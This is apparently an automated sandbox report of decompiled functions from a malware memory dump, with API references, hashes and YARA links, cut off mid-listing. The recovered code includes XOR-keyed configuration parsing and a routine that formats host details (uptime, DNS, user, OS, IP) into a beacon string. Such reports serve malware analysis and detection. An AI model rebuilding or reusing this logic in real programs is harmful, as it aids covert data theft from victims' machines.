0x04e9a72b
0x04e9a731

APIs

RtlAllocateHeap.NTDLL(00000000,00000000,04E95595), ref: 04E9A72B

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: e0065dda9a57df853bccbd69115788ac915ef0a47be36c9297a5dc0c23b3e7f1
Instruction ID: 35b860c22809c0caecf97e8cd4b94d58c6c00cb234fa9f8f154089287579f717
Opcode Fuzzy Hash: e0065dda9a57df853bccbd69115788ac915ef0a47be36c9297a5dc0c23b3e7f1
Instruction Fuzzy Hash: 7BB01271000100BBDA019B01DD09F05FB22FB50B02F114112B204440F88B354C60EB04

Uniqueness

Uniqueness Score: -1.00%

Function 04E94776, Relevance: 1.3, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04E94776(intOrPtr* __eax, void* __ecx, void* __edx, void* _a4, void** _a8) {
				int _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				int _v60;
				char _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				char _v92;
				void* _t35;
				void* _t40;
				void* _t49;
				void* _t51;
				int _t57;
				void* _t60;
				void* _t61;

				_t51 = _a4;
				_t57 = 0;
				_t58 = __ecx;
				_v12 = 0;
				_v8 = 0;
				_a4 = 0;
				if(__ecx <= 0x40 ||  *__eax != 0x200) {
					L21:
					return _t57;
				} else {
					_t6 = _t58 - 0x40; // 0x4e95249
					_t55 =  &_v92;
					_t35 = E04E91000(__eax,  &_v92, __edx,  &_v92,  &_v12, _t51 + _t6);
					if(_t35 != 0) {
						goto L21;
					}
					_t59 = __ecx - 0x40;
					if(_v60 > __ecx - 0x40) {
						goto L21;
					}
					while( *((char*)(_t61 + _t35 - 0x48)) == 0) {
						_t35 = _t35 + 1;
						if(_t35 < 0x10) {
							continue;
						}
						_t57 = _v60;
						_t49 = E04E9A71F(_t57);
						_a4 = _t49;
						_t70 = _t49;
						if(_t49 != 0) {
							_t57 = 0;
							L18:
							if(_t57 != 0) {
								goto L21;
							}
							L19:
							if(_a4 != 0) {
								E04E9A734(_a4);
							}
							goto L21;
						}
						memcpy(_t49, _t51, _t57);
						L8:
						_t60 = _a4;
						E04E990F4(_t55, _t70, _t60, _t57,  &_v28);
						if(_v28 != _v92 || _v24 != _v88 || _v20 != _v84 || _v16 != _v80) {
							L15:
							_t57 = 0;
							goto L19;
						} else {
							 *_a8 = _t60;
							goto L18;
						}
					}
					_t40 = E04E937B8(_t59, _t51,  &_a4,  &_v8,  &_v76, 0); // executed
					__eflags = _t40;
					if(_t40 != 0) {
						_t57 = _v8;
						goto L18;
					}
					_t57 = _v60;
					__eflags = _v8 - _t57;
					if(__eflags >= 0) {
						goto L8;
					}
					goto L15;
				}
			}

0x04e9477d
0x04e94782
0x04e94784
0x04e94786
0x04e94789
0x04e9478c
0x04e94792
0x04e94866
0x04e9486c
0x04e947a4
0x04e947a4
0x04e947ad
0x04e947b1
0x04e947b8
0x00000000
0x00000000
0x04e947be
0x04e947c4
0x00000000
0x00000000
0x04e947ca
0x04e947d1
0x04e947d5
0x00000000
0x00000000
0x04e947d7
0x04e947db
0x04e947e0
0x04e947e3
0x04e947e5
0x04e9484d
0x04e94854
0x04e94856
0x00000000
0x00000000
0x04e94858
0x04e9485c
0x04e94861
0x04e94861
0x00000000
0x04e9485c
0x04e947ea
0x04e947f2
0x04e947f2
0x04e947fb
0x04e94806
0x04e94849
0x04e94849
0x00000000
0x04e94820
0x04e94823
0x00000000
0x04e94823
0x04e94806
0x04e94838
0x04e9483d
0x04e9483f
0x04e94851
0x00000000
0x04e94851
0x04e94841
0x04e94844
0x04e94847
0x00000000
0x00000000
0x00000000
0x04e94847

APIs

memcpy.NTDLL(00000000,04E95289,?,?,?,04E95289,04E95249,00000002,04E95289,04E95289), ref: 04E947EA

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: memcpy
String ID:
API String ID: 3510742995-0
Opcode ID: 31d2aeb871fed480a51b5b04fc6f2b391b77cb89b72ef696dcf898d8526d7ca6
Instruction ID: 97f22a75c3bec9c7b28d8ad6d2e524c4c80d934aee32b7584c260d14eb7a8015
Opcode Fuzzy Hash: 31d2aeb871fed480a51b5b04fc6f2b391b77cb89b72ef696dcf898d8526d7ca6
Instruction Fuzzy Hash: 10314C72904188EBEF21DF96D8809EEBBF9AF80354F105426F915A71C0E630BE86CB50

Uniqueness

Uniqueness Score: -1.00%

Function 04E95356, Relevance: 1.3, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04E95356(intOrPtr* __edi, void* _a4, void* _a8, unsigned int _a12) {
				void* _t21;
				void* _t22;
				signed int _t24;
				intOrPtr* _t26;
				void* _t27;

				_t26 = __edi;
				if(_a4 == 0) {
					L2:
					_t27 = E04E98BC1(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t27 == 0) {
						_t24 = _a12 >> 1;
						if(_t24 == 0) {
							_t27 = 2;
							HeapFree( *0x4e9d238, 0, _a4);
						} else {
							_t21 = _a4;
							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
							 *_t26 = _t21;
						}
					}
					L6:
					return _t27;
				}
				_t22 = E04E948F1(_a4, _a8, _a12, __edi); // executed
				_t27 = _t22;
				if(_t27 == 0) {
					goto L6;
				}
				goto L2;
			}

0x04e95356
0x04e9535e
0x04e95375
0x04e95390
0x04e95394
0x04e95399
0x04e9539b
0x04e953ad
0x04e953b9
0x04e9539d
0x04e9539d
0x04e953a2
0x04e953a7
0x04e953a7
0x04e9539b
0x04e953bf
0x04e953c3
0x04e953c3
0x04e9536a
0x04e9536f
0x04e95373
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 04E948F1: SysFreeString.OLEAUT32(00000000), ref: 04E94954

HeapFree.KERNEL32(00000000,00000000,00000000,80000002,73BCF710,?,00000000,?,00000000,?,04E98D51,?,004F0053,05849368,00000000,?), ref: 04E953B9

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: Free$HeapString
String ID:
API String ID: 3806048269-0
Opcode ID: 666e7d42d90617019bbd2ef5034e612db2d0afb264cb2d00d28dc2b986ef192d
Instruction ID: 11b617bd4f38049e7dd6aa5781f82531e9247ae4f3b0d7b02fc80ea875e5159a
Opcode Fuzzy Hash: 666e7d42d90617019bbd2ef5034e612db2d0afb264cb2d00d28dc2b986ef192d
Instruction Fuzzy Hash: 7E014B32501619BBDF22DF58CC01EEE7BA5EF04790F449029FE099A1A4D771ED60DB90

Uniqueness

Uniqueness Score: -1.00%

Function 04E91AE2, Relevance: 1.3, APIs: 1, Instructions: 36
sleepCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E04E91AE2(intOrPtr* __edi) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _t15;
				intOrPtr* _t21;

				_t21 = __edi;
				_push( &_v12);
				_push(__edi);
				_v8 = 0x1d4c0;
				_t15 =  *((intOrPtr*)( *__edi + 0xe0))();
				while(1) {
					_v16 = _t15;
					Sleep(0x1f4); // executed
					if(_v12 == 4) {
						break;
					}
					if(_v8 == 0) {
						L4:
						_t15 =  *((intOrPtr*)( *_t21 + 0xe0))(_t21,  &_v12);
						continue;
					} else {
						if(_v8 <= 0x1f4) {
							_v16 = 0x80004004;
						} else {
							_v8 = _v8 - 0x1f4;
							goto L4;
						}
					}
					L8:
					return _v16;
				}
				goto L8;
			}

0x04e91ae2
0x04e91aef
0x04e91af0
0x04e91af1
0x04e91af8
0x04e91b26
0x04e91b27
0x04e91b2a
0x04e91b30
0x00000000
0x00000000
0x04e91b0f
0x04e91b19
0x04e91b20
0x00000000
0x04e91b11
0x04e91b14
0x04e91b34
0x04e91b16
0x04e91b16
0x00000000
0x04e91b16
0x04e91b14
0x04e91b3b
0x04e91b41
0x04e91b41
0x00000000

APIs

Sleep.KERNELBASE(000001F4), ref: 04E91B2A

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 910130caee73b3145302a434ad548345cd144bed08a13bdc51aba93ff25caa70
Instruction ID: 9e0a61dc4056d7087ff885d60e14d6482a349e5dc09a03769d0181005f2c2111
Opcode Fuzzy Hash: 910130caee73b3145302a434ad548345cd144bed08a13bdc51aba93ff25caa70
Instruction Fuzzy Hash: B7F0F675D01219EBDF00DB94C588AEDB7F8EF04209F1440AAE50263180E7746A44CB61

Uniqueness

Uniqueness Score: -1.00%

Function 04E95D7D, Relevance: 1.3, APIs: 1, Instructions: 26
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04E95D7D(intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, WCHAR* _a20) {
				void* _t17;

				if(_a4 == 0) {
					L2:
					return E04E96002(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
				}
				_t17 = E04E96207(_a4, _a8, _a12, _a16, _a20); // executed
				if(_t17 != 0) {
					goto L2;
				}
				return _t17;
			}

0x04e95d85
0x04e95d9f
0x00000000
0x04e95dbb
0x04e95d96
0x04e95d9d
0x00000000
0x00000000
0x04e95dc2

APIs

lstrlenW.KERNEL32(?,?,?,04E98708,3D04E9C0,80000002,04E93741,04E9A513,74666F53,4D4C4B48,04E9A513,?,3D04E9C0,80000002,04E93741,?), ref: 04E95DA2

Part of subcall function 04E96207: SysAllocString.OLEAUT32(04E9A513), ref: 04E96220
Part of subcall function 04E96207: SysFreeString.OLEAUT32(00000000), ref: 04E96261

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFreelstrlen
String ID:
API String ID: 3808004451-0
Opcode ID: 111656ecc7016b2b5b50f133360694a2d266d344cff97f8f718cb3fda9a876e6
Instruction ID: b7392b149c1a77bf36f0e17ec3c3b14e37694403e71d5020aee980607c97b817
Opcode Fuzzy Hash: 111656ecc7016b2b5b50f133360694a2d266d344cff97f8f718cb3fda9a876e6
Instruction Fuzzy Hash: 55F0927200020EBFDF165F90DC05E9A3FAAEB08354F048015FA14540A0D732E9B1EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04E94A09, Relevance: 1.3, APIs: 1, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04E94A09(void* __edi, void* _a4) {
				int _t7;
				int _t12;

				_t7 = E04E91526(__edi, _a4,  &_a4); // executed
				_t12 = _t7;
				if(_t12 != 0) {
					memcpy(__edi, _a4, _t12);
					 *((char*)(__edi + _t12)) = 0;
					E04E9A734(_a4);
				}
				return _t12;
			}

0x04e94a15
0x04e94a1a
0x04e94a1e
0x04e94a25
0x04e94a30
0x04e94a34
0x04e94a34
0x04e94a3d

APIs

Part of subcall function 04E91526: memcpy.NTDLL(00000000,00000090,00000002,00000002,04E95289,00000008,04E95289,04E95289,?,04E9A3FE,04E95289), ref: 04E9155C
Part of subcall function 04E91526: memset.NTDLL ref: 04E915D1
Part of subcall function 04E91526: memset.NTDLL ref: 04E915E5

memcpy.NTDLL(00000002,04E95289,00000000,00000002,04E95289,04E95289,04E95289,?,04E9A3FE,04E95289,?,04E95289,00000002,?,?,04E95D5E), ref: 04E94A25

Part of subcall function 04E9A734: RtlFreeHeap.NTDLL(00000000,00000000,04E95637,00000000,?,?,00000000), ref: 04E9A740

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: memcpymemset$FreeHeap
String ID:
API String ID: 3053036209-0
Opcode ID: e6817b10372af5116933f012d7fa3afbfc5e6b6b9757d7c95a37c68b0d13499d
Instruction ID: efda6bd8fe8ae8c33236401298d2253c803028cd3d20ec83c187c5c54da77aa2
Opcode Fuzzy Hash: e6817b10372af5116933f012d7fa3afbfc5e6b6b9757d7c95a37c68b0d13499d
Instruction Fuzzy Hash: F0E08C3740122977EF126B94EC00EEFBFAC8F516A5F005021FE088A240E631EA2097E2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 04E9888E, Relevance: 10.7, APIs: 7, Instructions: 237
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E04E9888E(int* __ecx) {
				int _v8;
				void* _v12;
				void* _v16;
				void* __esi;
				signed int _t26;
				signed int _t31;
				signed int _t37;
				char* _t43;
				char* _t44;
				char* _t45;
				char* _t46;
				char* _t47;
				void* _t48;
				void* _t49;
				void* _t50;
				intOrPtr _t51;
				void* _t53;
				intOrPtr _t54;
				intOrPtr _t55;
				signed int _t58;
				intOrPtr _t61;
				signed int _t62;
				signed int _t67;
				void* _t69;
				void* _t70;
				signed int _t72;
				signed int _t76;
				signed int _t80;
				signed int _t84;
				signed int _t88;
				signed int _t92;
				void* _t97;
				intOrPtr _t114;

				_t98 = __ecx;
				_t26 =  *0x4e9d2a4; // 0x63699bc3
				if(E04E97145( &_v8,  &_v12, _t26 ^ 0x8241c5a7) != 0 && _v12 >= 0x90) {
					 *0x4e9d2d8 = _v8;
				}
				_t31 =  *0x4e9d2a4; // 0x63699bc3
				if(E04E97145( &_v16,  &_v12, _t31 ^ 0x0b822240) == 0) {
					_v12 = 2;
					L62:
					return _v12;
				}
				_t37 =  *0x4e9d2a4; // 0x63699bc3
				if(E04E97145( &_v12,  &_v8, _t37 ^ 0xecd84622) == 0) {
					L60:
					HeapFree( *0x4e9d238, 0, _v16);
					goto L62;
				} else {
					_t97 = _v12;
					if(_t97 == 0) {
						_t43 = 0;
					} else {
						_t92 =  *0x4e9d2a4; // 0x63699bc3
						_t43 = E04E96B2E(_t98, _t97, _t92 ^ 0x724e87bc);
					}
					if(_t43 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t43, 0,  &_v8) != 0) {
							 *0x4e9d240 = _v8;
						}
					}
					if(_t97 == 0) {
						_t44 = 0;
					} else {
						_t88 =  *0x4e9d2a4; // 0x63699bc3
						_t44 = E04E96B2E(_t98, _t97, _t88 ^ 0x2b40cc40);
					}
					if(_t44 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t44, 0,  &_v8) != 0) {
							 *0x4e9d244 = _v8;
						}
					}
					if(_t97 == 0) {
						_t45 = 0;
					} else {
						_t84 =  *0x4e9d2a4; // 0x63699bc3
						_t45 = E04E96B2E(_t98, _t97, _t84 ^ 0x3b27c2e6);
					}
					if(_t45 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x4e9d248 = _v8;
						}
					}
					if(_t97 == 0) {
						_t46 = 0;
					} else {
						_t80 =  *0x4e9d2a4; // 0x63699bc3
						_t46 = E04E96B2E(_t98, _t97, _t80 ^ 0x0602e249);
					}
					if(_t46 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x4e9d004 = _v8;
						}
					}
					if(_t97 == 0) {
						_t47 = 0;
					} else {
						_t76 =  *0x4e9d2a4; // 0x63699bc3
						_t47 = E04E96B2E(_t98, _t97, _t76 ^ 0x3603764c);
					}
					if(_t47 != 0) {
						_t98 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x4e9d02c = _v8;
						}
					}
					if(_t97 == 0) {
						_t48 = 0;
					} else {
						_t72 =  *0x4e9d2a4; // 0x63699bc3
						_t48 = E04E96B2E(_t98, _t97, _t72 ^ 0x2cc1f2fd);
					}
					if(_t48 != 0) {
						_push(_t48);
						_t69 = 0x10;
						_t70 = E04E956FA(_t69);
						if(_t70 != 0) {
							_push(_t70);
							E04E96702();
						}
					}
					if(_t97 == 0) {
						_t49 = 0;
					} else {
						_t67 =  *0x4e9d2a4; // 0x63699bc3
						_t49 = E04E96B2E(_t98, _t97, _t67 ^ 0xb30fc035);
					}
					if(_t49 != 0 && E04E956FA(0, _t49) != 0) {
						_t114 =  *0x4e9d32c; // 0x58495b0
						E04E923F4(_t114 + 4, _t65);
					}
					if(_t97 == 0) {
						_t50 = 0;
					} else {
						_t62 =  *0x4e9d2a4; // 0x63699bc3
						_t50 = E04E96B2E(_t98, _t97, _t62 ^ 0x372ab5b7);
					}
					if(_t50 == 0) {
						L52:
						_t51 =  *0x4e9d2a8; // 0x9aa5a8
						_t20 = _t51 + 0x4e9e252; // 0x616d692f
						 *0x4e9d2d4 = _t20;
						goto L53;
					} else {
						_t61 = E04E956FA(0, _t50);
						 *0x4e9d2d4 = _t61;
						if(_t61 != 0) {
							L53:
							if(_t97 == 0) {
								_t53 = 0;
							} else {
								_t58 =  *0x4e9d2a4; // 0x63699bc3
								_t53 = E04E96B2E(_t98, _t97, _t58 ^ 0xd8dc5cde);
							}
							if(_t53 == 0) {
								_t54 =  *0x4e9d2a8; // 0x9aa5a8
								_t21 = _t54 + 0x4e9e791; // 0x6976612e
								_t55 = _t21;
							} else {
								_t55 = E04E956FA(0, _t53);
							}
							 *0x4e9d340 = _t55;
							HeapFree( *0x4e9d238, 0, _t97);
							_v12 = 0;
							goto L60;
						}
						goto L52;
					}
				}
			}

0x04e9888e
0x04e98891
0x04e988b1
0x04e988bf
0x04e988bf
0x04e988c4
0x04e988de
0x04e98b0d
0x04e98b14
0x04e98b1b
0x04e98b1b
0x04e988e4
0x04e98900
0x04e98afb
0x04e98b05
0x00000000
0x04e98906
0x04e98906
0x04e9890b
0x04e98921
0x04e9890d
0x04e9890d
0x04e9891a
0x04e9891a
0x04e9892b
0x04e9892d
0x04e98937
0x04e9893c
0x04e9893c
0x04e98937
0x04e98943
0x04e98959
0x04e98945
0x04e98945
0x04e98952
0x04e98952
0x04e9895d
0x04e9895f
0x04e98969
0x04e9896e
0x04e9896e
0x04e98969
0x04e98975
0x04e9898b
0x04e98977
0x04e98977
0x04e98984
0x04e98984
0x04e9898f
0x04e98991
0x04e9899b
0x04e989a0
0x04e989a0
0x04e9899b
0x04e989a7
0x04e989bd
0x04e989a9
0x04e989a9
0x04e989b6
0x04e989b6
0x04e989c1
0x04e989c3
0x04e989cd
0x04e989d2
0x04e989d2
0x04e989cd
0x04e989d9
0x04e989ef
0x04e989db
0x04e989db
0x04e989e8
0x04e989e8
0x04e989f3
0x04e989f5
0x04e989ff
0x04e98a04
0x04e98a04
0x04e989ff
0x04e98a0b
0x04e98a21
0x04e98a0d
0x04e98a0d
0x04e98a1a
0x04e98a1a
0x04e98a25
0x04e98a27
0x04e98a2a
0x04e98a2b
0x04e98a32
0x04e98a34
0x04e98a35
0x04e98a35
0x04e98a32
0x04e98a3c
0x04e98a52
0x04e98a3e
0x04e98a3e
0x04e98a4b
0x04e98a4b
0x04e98a56
0x04e98a64
0x04e98a6e
0x04e98a6e
0x04e98a75
0x04e98a8b
0x04e98a77
0x04e98a77
0x04e98a84
0x04e98a84
0x04e98a8f
0x04e98aa2
0x04e98aa2
0x04e98aa7
0x04e98aad
0x00000000
0x04e98a91
0x04e98a94
0x04e98a99
0x04e98aa0
0x04e98ab2
0x04e98ab4
0x04e98aca
0x04e98ab6
0x04e98ab6
0x04e98ac3
0x04e98ac3
0x04e98ace
0x04e98ada
0x04e98adf
0x04e98adf
0x04e98ad0
0x04e98ad3
0x04e98ad3
0x04e98aed
0x04e98af2
0x04e98af8
0x00000000
0x04e98af8
0x00000000
0x04e98aa0
0x04e98a8f

APIs

StrToIntExA.SHLWAPI(00000000,00000000,?,04E95D25,?,63699BC3,?,04E95D25,63699BC3,?,04E95D25,63699BC3,00000005,04E9D00C,00000008), ref: 04E98933
StrToIntExA.SHLWAPI(00000000,00000000,?,04E95D25,?,63699BC3,?,04E95D25,63699BC3,?,04E95D25,63699BC3,00000005,04E9D00C,00000008), ref: 04E98965
StrToIntExA.SHLWAPI(00000000,00000000,?,04E95D25,?,63699BC3,?,04E95D25,63699BC3,?,04E95D25,63699BC3,00000005,04E9D00C,00000008), ref: 04E98997
StrToIntExA.SHLWAPI(00000000,00000000,?,04E95D25,?,63699BC3,?,04E95D25,63699BC3,?,04E95D25,63699BC3,00000005,04E9D00C,00000008), ref: 04E989C9
StrToIntExA.SHLWAPI(00000000,00000000,?,04E95D25,?,63699BC3,?,04E95D25,63699BC3,?,04E95D25,63699BC3,00000005,04E9D00C,00000008), ref: 04E989FB
HeapFree.KERNEL32(00000000,04E95D25,04E95D25,?,63699BC3,?,04E95D25,63699BC3,?,04E95D25,63699BC3,00000005,04E9D00C,00000008,?,04E95D25), ref: 04E98AF2
HeapFree.KERNEL32(00000000,?,04E95D25,?,63699BC3,?,04E95D25,63699BC3,?,04E95D25,63699BC3,00000005,04E9D00C,00000008,?,04E95D25), ref: 04E98B05

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: bc0a1149471f17dfba9b24d73b2785fd7eea06fac007dea18613fa9e2c7c6e64
Instruction ID: e18033f9b16408c6ab84d3124532750fd3f12f8d4b3a7a8f235295dc0962e92c
Opcode Fuzzy Hash: bc0a1149471f17dfba9b24d73b2785fd7eea06fac007dea18613fa9e2c7c6e64
Instruction Fuzzy Hash: B471CD70A20115AFEF50FBBACD84D9BB7EDEB493047242916A406D72E8FA74FD418720

Uniqueness

Uniqueness Score: -1.00%

Function 04E91F13, Relevance: 34.7, APIs: 23, Instructions: 201
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E04E91F13(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v44;
				intOrPtr _v52;
				void* __edi;
				long _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t33;
				intOrPtr _t34;
				int _t37;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t50;
				intOrPtr _t54;
				intOrPtr* _t56;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t71;
				intOrPtr _t74;
				int _t77;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t83;
				int _t86;
				intOrPtr* _t89;
				intOrPtr* _t90;
				void* _t91;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;
				void* _t100;
				int _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;

				_t95 = __edx;
				_t91 = __ecx;
				_t25 = __eax;
				_t105 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t25 = GetTickCount();
				}
				_t26 =  *0x4e9d018; // 0xbdb28b76
				asm("bswap eax");
				_t27 =  *0x4e9d014; // 0x3a87c8cd
				asm("bswap eax");
				_t28 =  *0x4e9d010; // 0xd8d2f808
				asm("bswap eax");
				_t29 =  *0x4e9d00c; // 0x81762942
				asm("bswap eax");
				_t30 =  *0x4e9d2a8; // 0x9aa5a8
				_t3 = _t30 + 0x4e9e633; // 0x74666f73
				_t101 = wsprintfA(_t105, _t3, 2, 0x3d15e, _t29, _t28, _t27, _t26,  *0x4e9d02c,  *0x4e9d004, _t25);
				_t33 = E04E956CD();
				_t34 =  *0x4e9d2a8; // 0x9aa5a8
				_t4 = _t34 + 0x4e9e673; // 0x74707526
				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
				_t108 = _t106 + 0x38;
				_t102 = _t101 + _t37;
				_t96 = E04E958DB(_t91);
				if(_t96 != 0) {
					_t83 =  *0x4e9d2a8; // 0x9aa5a8
					_t6 = _t83 + 0x4e9e8d4; // 0x736e6426
					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t86;
					HeapFree( *0x4e9d238, 0, _t96);
				}
				_t97 = E04E9A199();
				if(_t97 != 0) {
					_t78 =  *0x4e9d2a8; // 0x9aa5a8
					_t8 = _t78 + 0x4e9e8dc; // 0x6f687726
					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t81;
					HeapFree( *0x4e9d238, 0, _t97);
				}
				_t98 =  *0x4e9d32c; // 0x58495b0
				_a32 = E04E94622( &E04E9D00A, _t98 + 4);
				_t42 =  *0x4e9d2d0; // 0x0
				if(_t42 != 0) {
					_t74 =  *0x4e9d2a8; // 0x9aa5a8
					_t11 = _t74 + 0x4e9e8b6; // 0x3d736f26
					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t77;
				}
				_t43 =  *0x4e9d2cc; // 0x0
				if(_t43 != 0) {
					_t71 =  *0x4e9d2a8; // 0x9aa5a8
					_t13 = _t71 + 0x4e9e88d; // 0x3d706926
					wsprintfA(_t102 + _t105, _t13, _t43);
				}
				if(_a32 != 0) {
					_t100 = RtlAllocateHeap( *0x4e9d238, 0, 0x800);
					if(_t100 != 0) {
						E04E9518F(GetTickCount());
						_t50 =  *0x4e9d32c; // 0x58495b0
						__imp__(_t50 + 0x40);
						asm("lock xadd [eax], ecx");
						_t54 =  *0x4e9d32c; // 0x58495b0
						__imp__(_t54 + 0x40);
						_t56 =  *0x4e9d32c; // 0x58495b0
						_t103 = E04E91BB6(1, _t95, _t105,  *_t56);
						asm("lock xadd [eax], ecx");
						if(_t103 != 0) {
							StrTrimA(_t103, 0x4e9c28c);
							_push(_t103);
							_t62 = E04E9361A();
							_v16 = _t62;
							if(_t62 != 0) {
								_t89 = __imp__;
								 *_t89(_t103, _v0);
								 *_t89(_t100, _a4);
								_t90 = __imp__;
								 *_t90(_t100, _v28);
								 *_t90(_t100, _t103);
								_t68 = E04E96777(0xffffffffffffffff, _t100, _v28, _v24);
								_v52 = _t68;
								if(_t68 != 0 && _t68 != 0x10d2) {
									E04E96761();
								}
								HeapFree( *0x4e9d238, 0, _v44);
							}
							HeapFree( *0x4e9d238, 0, _t103);
						}
						HeapFree( *0x4e9d238, 0, _t100);
					}
					HeapFree( *0x4e9d238, 0, _a24);
				}
				HeapFree( *0x4e9d238, 0, _t105);
				return _a12;
			}

0x04e91f13
0x04e91f13
0x04e91f13
0x04e91f18
0x04e91f1e
0x04e91f28
0x04e91f2a
0x04e91f2a
0x04e91f37
0x04e91f42
0x04e91f45
0x04e91f50
0x04e91f53
0x04e91f58
0x04e91f5b
0x04e91f60
0x04e91f63
0x04e91f6f
0x04e91f7c
0x04e91f7e
0x04e91f84
0x04e91f89
0x04e91f94
0x04e91f96
0x04e91f99
0x04e91fa0
0x04e91fa4
0x04e91fa6
0x04e91fab
0x04e91fb7
0x04e91fb9
0x04e91fc5
0x04e91fc7
0x04e91fc7
0x04e91fd2
0x04e91fd6
0x04e91fd8
0x04e91fdd
0x04e91fe9
0x04e91feb
0x04e91ff7
0x04e91ff9
0x04e91ff9
0x04e91fff
0x04e92012
0x04e92016
0x04e9201d
0x04e92020
0x04e92025
0x04e92030
0x04e92032
